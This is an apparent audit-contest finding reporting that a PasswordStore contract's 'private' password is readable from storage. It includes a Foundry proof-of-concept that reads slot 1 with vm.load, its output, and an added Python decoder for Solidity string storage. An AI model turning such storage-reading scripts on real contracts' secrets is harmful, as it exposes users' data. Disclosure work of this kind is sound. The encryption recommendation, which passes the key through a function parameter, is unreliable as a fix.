Submission Details
Severity: high
Valid

Business Logic - Private variable does not keep value hidden from view

Summary

Despite being declared private, the s_password variable is still publicly viewable and is saved in plain text, making the protocol a very poor choice for securely storing passwords.

Vulnerability Details

By calling Foundry's vm.load() on the contract's storage slot for s_password, anyone is able to view the stored value.

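    import {Script, console2} from "forge-std/Script.sol";
    // Import path assumed; adjust to where PasswordStore lives in the project.
    import {PasswordStore} from "../src/PasswordStore.sol";

    contract DeployPasswordStore is Script {
        function run() public returns (PasswordStore) {
            vm.startBroadcast();
            PasswordStore passwordStore = new PasswordStore();
            passwordStore.setPassword("myPassword");
            // Read storage slot 1 (s_password) directly; `private` does not restrict this.
            bytes32 foundYourPass = vm.load(address(passwordStore), bytes32(uint256(1)));
            // Reinterpret the raw 32-byte storage word as a string and log it.
            string memory stringPassword = string(abi.encodePacked(foundYourPass));
            console2.log(stringPassword);
            vm.stopBroadcast();
            return passwordStore;
        }
    }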

Results in:

Compiler run successful!
Script ran successfully.
== Return ==
0: contract PasswordStore 0x34A1D3fff3958843C43aD80F30b94c510645C316
== Logs ==
myPassword
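
Why the raw slot prints as readable text, as an added example that is not part of the original submission: it decodes a 32-byte storage word using Solidity's documented string storage layout, and generalizes past the PoC by also handling strings longer than 31 bytes. The function names are hypothetical, the sample word is constructed, and it assumes s_password is a string in slot 1, as the PoC above reads it.

```python
"""Decode a Solidity `string` state variable from raw storage words."""


def encode_short_string(text: str) -> bytes:
    """Build the 32-byte word Solidity stores for a string of at most 31 bytes."""
    data = text.encode()
    if len(data) > 31:
        raise ValueError("short layout only holds up to 31 bytes")
    # Data is left-aligned; the lowest-order byte holds length * 2.
    return data.ljust(31, b"\x00") + bytes([len(data) * 2])


def decode_string_slot(word: bytes, data_words=()) -> str:
    """Decode the main slot of a `string`.

    data_words are the consecutive words stored from keccak256(slot) onward;
    they are only needed when the string is 32 bytes or longer.
    """
    if len(word) != 32:
        raise ValueError("a storage word is exactly 32 bytes")
    value = int.from_bytes(word, "big")
    if value & 1 == 0:
        # Short layout: lowest bit clear, lowest byte = length * 2.
        length = word[31] // 2
        if length > 31:
            raise ValueError("corrupt short-string length")
        return word[:length].decode()
    # Long layout: main slot = length * 2 + 1, content lives in data_words.
    length = (value - 1) // 2
    blob = b"".join(data_words)
    if len(blob) < length:
        needed = -(-length // 32)  # ceiling division
        raise ValueError(f"need {needed} data words, got {len(data_words)}")
    return blob[:length].decode()


# Constructed sample: the word slot 1 would hold after setPassword("myPassword").
SAMPLE_WORD = encode_short_string("myPassword")

if __name__ == "__main__":
    print(SAMPLE_WORD.hex())
    print(decode_string_slot(SAMPLE_WORD))
```

The trailing 0x14 byte in the sample word is the length marker (10 * 2), which is why the PoC's logged string carries non-printing bytes after the password.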

Impact

Anyone can access the password value at any time, compromising whatever the password was meant to protect.

Tools Used

Manual Review
Foundry

Recommendations

Have the setPassword and getPassword functions take a shared input parameter that is used to encrypt/decrypt the stored password value.

Updates

Lead Judging Commences

inallhonesty Lead Judge
almost 2 years ago
Submission Judgement Published
Validated
Assigned finding tags:

finding-anyone-can-read-storage

Private functions and state variables are only visible for the contract they are defined in and not in derived contracts. In this case, private doesn't mean secret/confidential.
